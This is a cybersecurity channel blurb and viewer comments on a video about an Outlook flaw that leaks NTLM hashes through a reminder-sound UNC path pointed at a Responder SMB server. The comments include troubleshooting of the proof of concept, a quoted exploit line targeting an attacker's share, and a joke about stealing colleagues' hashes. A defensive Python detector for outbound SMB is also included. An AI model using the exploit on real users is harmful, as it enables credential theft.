The official channel for Machevalia's cybersecurity content. Learn about various topics, tactics, techniques, and procedures that cybersecurity professionals use. I cover a variety of topics from how to hack (ethically), investigate SOC alarms, conduct forensics investigations, and general cybersecurity concepts.
What are the hashes that are retrieved with this CVE for? Are they password hashes for the users to access the SMB? I'm sorry if I'm asking a dumb question here, I just couldn't really gather what the hashes represent. Edit: I guess you get NTLM hashes representing the users' AD password?
Hey thanks... good video. I'm just dipping my toes into security. When you say "dumping hashes" what exactly is going on there? What is happening? I understand it's bad... but exactly how? Also, what does that Responder application/server you were talking about do?
Hey Ryan, good question. Within a lot of Windows processes there is authentication occurring under the hood that a normal user is unaware of. Being extremely user-friendly, Windows takes care of that for us. However, issues can arise when an attacker finds a way to take advantage of this automatic authentication, which is what is occurring here. Essentially, Responder.py is a fake SMB share that, when a victim machine requests a resource like our fake appointment sound file via that UNC path we provide, obtains a victim's NTLM password hash. With that, an attacker could attempt to crack the victim's password hash to recover their actual password, or they could even relay that NTLM hash in some cases to authenticate to another service as the victim user. I would recommend reading up on pass-the-hash attacks for more.
Thanks for the walk-through! Can you please let me know whether the Responder tool and the attacker's SMB share should be on the same machine in order for it to work? I'm getting the invite but I don't see the hashes.
Responder can be anywhere that is either accessible by the victim on the LAN or on the public Internet. If you have SMB outbound blocked then Responder on the local network will still work as long as the victim can reach it. An easy way to test is to open File Explorer on the victim and in the address bar navigate to \\<responder IP>\share and you should be prompted to authenticate to Responder. If that isn't working, you may also want to make sure you have a vulnerable version of Outlook installed since there is a patch out.
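The reply above mentions blocking SMB outbound as the control that stops this kind of hash capture reaching the Internet. As an added example that is not part of the video, the channel, or any commenter's script, the following Python script shows how a defender would check firewall logs for that condition: it parses constructed key=value style firewall lines (not from any real device; the log format, host names and the INTERNAL_NETWORKS ranges are assumptions) and flags any internal host talking to TCP/445 or TCP/139 on an address outside the organisation's internal ranges. Denied attempts are reported separately, because a blocked outbound SMB connection still tells you which workstation tried to authenticate to an external share and is worth investigating.

```python
import ipaddress
import re

# Internal address space for the hypothetical organisation; anything outside
# these ranges is treated as external for this check (an assumption, adjust to
# the real environment).
INTERNAL_NETWORKS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# TCP ports used by SMB (445) and the legacy NetBIOS session service (139).
SMB_PORTS = {445, 139}

# Constructed sample log lines. The 203.0.113.0/24 and 198.51.100.0/24
# addresses are RFC 5737 documentation ranges standing in for public hosts.
SAMPLE_LOG = """\
2023-03-20T09:14:02Z fw01 action=allow proto=tcp src=10.1.2.33 dst=10.1.2.10 dport=445
2023-03-20T09:14:05Z fw01 action=allow proto=tcp src=10.1.2.33 dst=203.0.113.25 dport=445
2023-03-20T09:14:06Z fw01 action=deny proto=tcp src=10.1.2.41 dst=198.51.100.7 dport=445
2023-03-20T09:14:09Z fw01 action=allow proto=tcp src=10.1.2.33 dst=203.0.113.25 dport=443
2023-03-20T09:15:11Z fw01 action=allow proto=tcp src=10.1.2.58 dst=198.51.100.7 dport=139
"""

# timestamp, reporting host, then a run of key=value tokens
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<kv>.*)$")


def parse_line(line):
    """Parse one log line into a dict, or return None if it is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = {}
    for token in m.group("kv").split():
        if "=" in token:
            key, value = token.split("=", 1)
            fields[key] = value
    try:
        return {
            "ts": m.group("ts"),
            "action": fields["action"],
            "proto": fields["proto"].lower(),
            "src": fields["src"],
            "dst": fields["dst"],
            "dport": int(fields["dport"]),
        }
    except (KeyError, ValueError):
        return None


def is_internal(addr):
    """True if the address falls inside one of the configured internal ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETWORKS)


def find_external_smb(lines):
    """Return records where an internal host connects to SMB on an external host."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["proto"] != "tcp" or rec["dport"] not in SMB_PORTS:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            hits.append(rec)
    return hits


def summarize(hits):
    """Split findings by firewall verdict; both groups deserve a look."""
    return {
        "allowed": [h for h in hits if h["action"] == "allow"],
        "denied": [h for h in hits if h["action"] != "allow"],
    }


if __name__ == "__main__":
    report = summarize(find_external_smb(SAMPLE_LOG.splitlines()))
    for verdict, records in report.items():
        for r in records:
            print(f"{verdict:7} {r['ts']} {r['src']} -> {r['dst']}:{r['dport']}")
```

The "allowed" findings are the ones that indicate the egress control is missing or has a gap; the "denied" findings show the control working, but the source hosts still attempted an external SMB authentication and should be checked for whatever triggered it, such as a calendar item pointing at an external UNC path.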
@machevalia Thanks, can you please share which Outlook version you used during your test? I'm running Outlook for Office 365 (16.0.12527.22286) 32-bit and it doesn't seem to work. I checked that SMB outbound isn't blocked on the victim's machine and it can access the share I configured in the PS script.
Interesting, I am not sure without going fully into troubleshooting it. I know the patched version is 16.0.16130.20306+ so it looks like you should be good. May just have to play around with it some more. I haven't done much with it since the video but I had varying degrees of success with different versions of Outlook, network configurations, and each of the various PoCs. It's a finicky one.
@machevalia Thanks! It was an environmental issue on my end. I managed to resolve this! Do you by chance know where the UNC path is stored in the .EML file? I couldn't find it, which is truly interesting: this info doesn't show but can be triggered regardless.
$meeting.ReminderSoundFile = "\\<UNC PATH>" # Change to your SMB server
How should I fill this in? I filled in my local IP and started Responder on my machine. Outlook has a calendar reminder popup, but I did not receive the NTLM hash.
Sounds like you need to make sure your "victim" running Outlook can access the IP address of the machine running responder. If you're using a virtual machine for Responder, check the NIC settings.
Hey, nice walk-through! Glad you found the script useful (I'm ka7ana). Would be interested to know if you got round to trying it out on your colleagues and managed to grab their hashes too! :D
I successfully received the local NTLM hash during local testing, but only once. When I tried to modify it and send it to the remote user, I did not receive the hash but only an IPC connection.